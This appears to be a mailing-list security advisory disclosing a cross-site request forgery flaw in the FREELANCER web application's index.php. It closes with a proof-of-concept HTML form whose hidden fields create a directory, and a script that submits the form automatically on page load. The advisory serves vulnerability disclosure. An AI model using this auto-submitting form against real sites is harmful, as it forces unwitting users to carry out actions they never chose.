[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

CSRF (Cross-Site Request Forgery) in FREELANCER



Product: FREELANCER
Vendor: http://www.got.my ( http://www.got.my/FREELANCER/ )
Vulnerable Version: 1.0.0
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Risk level: Low
Credit: Hector.x90

Vulnerability Details:
The vulnerability exists due to failure in the "index.php" script to properly verify the source of HTTP request.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
Attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://[host]/index.php"; method="post" name="main" id="main">
<input type="hidden" name="createdirname" value="1">
<input type="hidden" name="dircreate" value="1">
<input type="hidden" name="dir" value="">
<input type="hidden" name="submit" value="OK">
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>